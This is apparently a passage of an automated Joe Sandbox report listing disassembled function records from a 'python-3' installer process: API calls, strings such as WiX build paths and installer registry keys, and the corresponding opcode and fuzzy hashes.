                                                                                                                                  • Instruction Fuzzy Hash: 2541A239E00119ABCB60EF95CA51FAEBBB9EF84710F22406FE501A7321D7388E41D758
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C9213: lstrlenW.KERNEL32(00000100,?,?,?,004C95B3,000002C0,00000100,00000100,00000100,?,?,?,004A7BE4,?,?,000001BC), ref: 004C9238
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,004CB4F0,wininet.dll,?), ref: 004C9422
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,004CB4F0,wininet.dll,?), ref: 004C942F
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                    • Part of subcall function 004C131B: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,004A8C68), ref: 004C1376
                                                                                                                                    • Part of subcall function 004C131B: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004A8C68,00000000), ref: 004C1394
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                                  • String ID: wininet.dll
                                                                                                                                  • API String ID: 2680864210-3354682871
                                                                                                                                  • Opcode ID: 2674ef89d5e7f3460bbce1a57d23b65e14e08b2087182cd0351c7a57a610cb0f
                                                                                                                                  • Instruction ID: a7ae3427bc2b55e2593bfaf7d1b390e53259864a562efa22d951ac5f77e22f30
                                                                                                                                  • Opcode Fuzzy Hash: 2674ef89d5e7f3460bbce1a57d23b65e14e08b2087182cd0351c7a57a610cb0f
                                                                                                                                  • Instruction Fuzzy Hash: F4315D3AC0016ABBCF51AF95CD84EAEBB75EF04314B1141BEED01B6221D3395E119B98
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,004BD034,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BCDDC
                                                                                                                                  • GetLastError.KERNEL32(004BD034,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BCE0C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: I\K
                                                                                                                                  • API String ID: 442123175-1997202717
                                                                                                                                  • Opcode ID: 1851bde0b9e03666b5c52974ba9143ce7f63a2d16a7f5a2cbbfa62347b6bf517
                                                                                                                                  • Instruction ID: 127fe3f4d44593a1d566f47a706865b1db993c7523aaa257dbccaa1bf1164dca
                                                                                                                                  • Opcode Fuzzy Hash: 1851bde0b9e03666b5c52974ba9143ce7f63a2d16a7f5a2cbbfa62347b6bf517
                                                                                                                                  • Instruction Fuzzy Hash: 0031A375A00219AFDB14CF69DCC1AEA77B9EB44300F1440BAE905D7350DB34ED858BB4
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004C43B8
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C441B
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C443F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 1948546556-3168567549
                                                                                                                                  • Opcode ID: c55adda3d1d0adc20db48da27d0fc927dc7d36a1ca3ed54cf662f61f70fd2ab9
                                                                                                                                  • Instruction ID: c0ee15bb6ff797bafc0b3a3bd004b22302c692cada70a8a7683eee47e510bb8b
                                                                                                                                  • Opcode Fuzzy Hash: c55adda3d1d0adc20db48da27d0fc927dc7d36a1ca3ed54cf662f61f70fd2ab9
                                                                                                                                  • Instruction Fuzzy Hash: 8C31E039A002A99BDB65CF59CE50BDF77B4BB84751F1040AFE949E7240C7B89DC08B98
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,I\K,00000000,00000000,?,004BD024,00000000,00000000,00000000,00000000,?,00000000), ref: 004BCCB2
                                                                                                                                  • GetLastError.KERNEL32(?,004BD024,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BCCD8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: I\K
                                                                                                                                  • API String ID: 442123175-1997202717
                                                                                                                                  • Opcode ID: cb5722fce9032ca87a758552c37c6d0396eace5488819bc094e83e49f07e80bc
                                                                                                                                  • Instruction ID: d41cef3ef1b3c021235dd61831814ccfc33414aad775ce8026a6ef9eab28e6b1
                                                                                                                                  • Opcode Fuzzy Hash: cb5722fce9032ca87a758552c37c6d0396eace5488819bc094e83e49f07e80bc
                                                                                                                                  • Instruction Fuzzy Hash: 7831D031A002189BCB14CF19DCC19EAB7B9FF59314F1444AAE90EDB250D734AD81CBA8
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,I\K,00000000,00000000,?,004BD044,00000000,00000000,00000000,00000000,?,00000000), ref: 004BCBC7
                                                                                                                                  • GetLastError.KERNEL32(?,004BD044,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BCBED
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: I\K
                                                                                                                                  • API String ID: 442123175-1997202717
                                                                                                                                  • Opcode ID: 1810ed8353f9e28f938d28a662ea92c50807e89c965fbc1c5102b437f1df84ef
                                                                                                                                  • Instruction ID: de9ba0ef20fa4ad2c267654e764a2d40840faa62233e074fa59677dd5bb824ee
                                                                                                                                  • Opcode Fuzzy Hash: 1810ed8353f9e28f938d28a662ea92c50807e89c965fbc1c5102b437f1df84ef
                                                                                                                                  • Instruction Fuzzy Hash: 7821A234A002189FCB15CF29EDC19EEB7B9EB49311F1441AAE90AD7211D634AD468B68
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                  • String ID: crypt32.dll$wininet.dll
                                                                                                                                  • API String ID: 2001391462-82500532
                                                                                                                                  • Opcode ID: 39ffa86aa758ca96ac80bca0cde021d7e7403628b06e64b8df67a1e9bd647b60
                                                                                                                                  • Instruction ID: b4ff283056816497c1aca1c72af671a2fbe4d3327b82b935971eb9560b02952a
                                                                                                                                  • Opcode Fuzzy Hash: 39ffa86aa758ca96ac80bca0cde021d7e7403628b06e64b8df67a1e9bd647b60
                                                                                                                                  • Instruction Fuzzy Hash: D01160B1600219AFCF08DF19CDD59AF7F69EF85794B14842AFD054B312D634EA148BE4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,?,?,?,?,00494029,feclient.dll,?,00000000,?,?,?,00484B92), ref: 00493BBA
                                                                                                                                    • Part of subcall function 004C1571: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004C15E7
                                                                                                                                    • Part of subcall function 004C1571: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 004C161F
                                                                                                                                  Strings
                                                                                                                                  • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00493B30
                                                                                                                                  • Logging, xrefs: 00493B47
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                  • API String ID: 1586453840-387823766
                                                                                                                                  • Opcode ID: 9c3dc72a57060310746e0fbc8d2ff2aaa4f979fa6d8be63a46f9929dfb2e2621
                                                                                                                                  • Instruction ID: 9b051c475acb42ef4962ba7be68be0af9c64d67aee47028adb1d2bee5e219cde
                                                                                                                                  • Opcode Fuzzy Hash: 9c3dc72a57060310746e0fbc8d2ff2aaa4f979fa6d8be63a46f9929dfb2e2621
                                                                                                                                  • Instruction Fuzzy Hash: 65112935500215ABEF249E518C56FBB7BA4AB42B5AFA0007BE801E7282D778AF41965C
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExW.ADVAPI32(00020006,004D0FB8,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0048F3CC,00000000,?,00020006), ref: 004C19CD
                                                                                                                                  • RegDeleteValueW.ADVAPI32(00020006,004D0FB8,00000000,?,?,0048F3CC,00000000,?,00020006,?,004D0FB8,00020006,00000000,?,?,?), ref: 004C19FD
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C1A31
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$Delete
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 1738766685-3069916640
                                                                                                                                  • Opcode ID: c752672727e946ef0214c86c55f723dfb7b38587f089452653ea39f7451d9899
                                                                                                                                  • Instruction ID: 0a2e835367fe38d7c137c06fc85cf32988c92396e2a062caba783b7b0baee3ee
                                                                                                                                  • Opcode Fuzzy Hash: c752672727e946ef0214c86c55f723dfb7b38587f089452653ea39f7451d9899
                                                                                                                                  • Instruction Fuzzy Hash: 65113D3E901136B7CB6199948C05F9F7561AB02760F11412FFD01BA172E239CD10D7D8
                                                                                                                                  APIs
                                                                                                                                  • LCMapStringW.KERNEL32(0000007F,00000000,00000000,004970CF,00000000,004970CF,00000000,00000000,004970CF,00000000,00000000,00000000,?,0048244B,00000000,00000000), ref: 004815BC
                                                                                                                                  • GetLastError.KERNEL32(?,0048244B,00000000,00000000,004970CF,00000200,?,004C56D5,00000000,004970CF,00000000,004970CF,00000000,00000000,00000000), ref: 004815C6
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\strutil.cpp, xrefs: 004815EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastString
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\strutil.cpp
                                                                                                                                  • API String ID: 3728238275-1498286024
                                                                                                                                  • Opcode ID: d87a01c3bae38994802886f5e827c94ce13cb1bc6b6c2b94bfe66da3eb512446
                                                                                                                                  • Instruction ID: 1836f9835f14769c8b511970f1729d46e534d0269c114b910bb0fa2f0a5e10cf
                                                                                                                                  • Opcode Fuzzy Hash: d87a01c3bae38994802886f5e827c94ce13cb1bc6b6c2b94bfe66da3eb512446
                                                                                                                                  • Instruction Fuzzy Hash: 76012D37900275B7CB21AE968C45E5F7A6CEF85B70F010927FD10AB260C724DC1187E4
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 00495849
                                                                                                                                  • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 004958A2
                                                                                                                                  Strings
                                                                                                                                  • Failed to initialize COM on cache thread., xrefs: 0049585E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                  • String ID: Failed to initialize COM on cache thread.
                                                                                                                                  • API String ID: 3442037557-3629645316
                                                                                                                                  • Opcode ID: d5e3f84b67f746a5a6f65a2b0b5c57840e3cc6c81a98a5db019fabcada9ace44
                                                                                                                                  • Instruction ID: d27e95cb030b8ad476a65eb649176eddb24ffc8a71369b53bb71c4fe2c49127f
                                                                                                                                  • Opcode Fuzzy Hash: d5e3f84b67f746a5a6f65a2b0b5c57840e3cc6c81a98a5db019fabcada9ace44
                                                                                                                                  • Instruction Fuzzy Hash: 8A01AD72600618FFCB059F99D884DDAFBACFF08354B10413AF90997221DB34AD108B98
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00498E75,?,00000001,20000004,00000000,00000000,?,00000000), ref: 004C5A8A
                                                                                                                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00498E75,?), ref: 004C5AA5
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\aclutil.cpp, xrefs: 004C5AC9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoNamedSecuritySleep
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\aclutil.cpp
                                                                                                                                  • API String ID: 2352087905-245660080
                                                                                                                                  • Opcode ID: 6127a8cddcbc1d1ff64f6c6e04a7d1dd3fb5bef2ccba7c681252e5e25430e683
                                                                                                                                  • Instruction ID: a9eb576f35848039e6ae07099ce3beac4658d37d92d260a9da0b5078f5a4dbc1
                                                                                                                                  • Opcode Fuzzy Hash: 6127a8cddcbc1d1ff64f6c6e04a7d1dd3fb5bef2ccba7c681252e5e25430e683
                                                                                                                                  • Instruction Fuzzy Hash: FD01823B801529ABCF229F86CD45F8F7A75EF44750F02021AFD0466210C27A9D5097D8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,004C3F01,?), ref: 004C40D2
                                                                                                                                  Strings
                                                                                                                                  • EnableLUA, xrefs: 004C40A4
                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 004C407C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                  • API String ID: 47109696-3551287084
                                                                                                                                  • Opcode ID: 2da187e0d8f99d576debceb21eb38e46bfc598429c06dd079c277c8daf316b5f
                                                                                                                                  • Instruction ID: aea57d696ae79b67d4460c8d0253ba5976bdc06cccd7b272fbc3f436a6794ad2
                                                                                                                                  • Opcode Fuzzy Hash: 2da187e0d8f99d576debceb21eb38e46bfc598429c06dd079c277c8daf316b5f
                                                                                                                                  • Instruction Fuzzy Hash: 2601D436851228FBD76096A6C906FDEF668DB50721F21416AEA01B3151D3785E44C7DC
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004C6D09
                                                                                                                                    • Part of subcall function 004C8AF0: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 004C8BFD
                                                                                                                                    • Part of subcall function 004C8AF0: GetLastError.KERNEL32 ref: 004C8C07
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\atomutil.cpp, xrefs: 004C6CF7
                                                                                                                                  • clbcatq.dll, xrefs: 004C6CD6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\atomutil.cpp$clbcatq.dll
                                                                                                                                  • API String ID: 211557998-1149883586
                                                                                                                                  • Opcode ID: 59d49b0f3f9ee124ef053df09d06bd9fa9cc34a9d8e38a2647925ad620924121
                                                                                                                                  • Instruction ID: 4a4926af65fc12524541c6b1af5dbd8d35f7cd68af97a3231f8cc70e2ab1476a
                                                                                                                                  • Opcode Fuzzy Hash: 59d49b0f3f9ee124ef053df09d06bd9fa9cc34a9d8e38a2647925ad620924121
                                                                                                                                  • Instruction Fuzzy Hash: 1901F275A00115FB8B605F86AC41E5AFBB8EF04364B21C03FF902A3200C3759E00C798
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,004C43DF,?,?,?), ref: 004C528D
                                                                                                                                  • GetLastError.KERNEL32(?,?,004C43DF,?,?,?), ref: 004C5297
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C52C0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 442123175-3168567549
                                                                                                                                  • Opcode ID: e6b29817e595c1e23547cc50e55e57d17f94c1550e8ad1cce5efd0ac8743a8cc
                                                                                                                                  • Instruction ID: 7afe1e69111db20b3acb9471a140b4ac331c2b3d5a9410be32e2e0a6497eb127
                                                                                                                                  • Opcode Fuzzy Hash: e6b29817e595c1e23547cc50e55e57d17f94c1550e8ad1cce5efd0ac8743a8cc
                                                                                                                                  • Instruction Fuzzy Hash: 35F0AD37600629ABC7108E8ACC45F9FBBADFB44761F00416AF901E7100D724A9008AE8
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,004810DD,?,00000000), ref: 00483510
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004810DD,?,00000000), ref: 00483527
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\pathutil.cpp, xrefs: 0048354B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
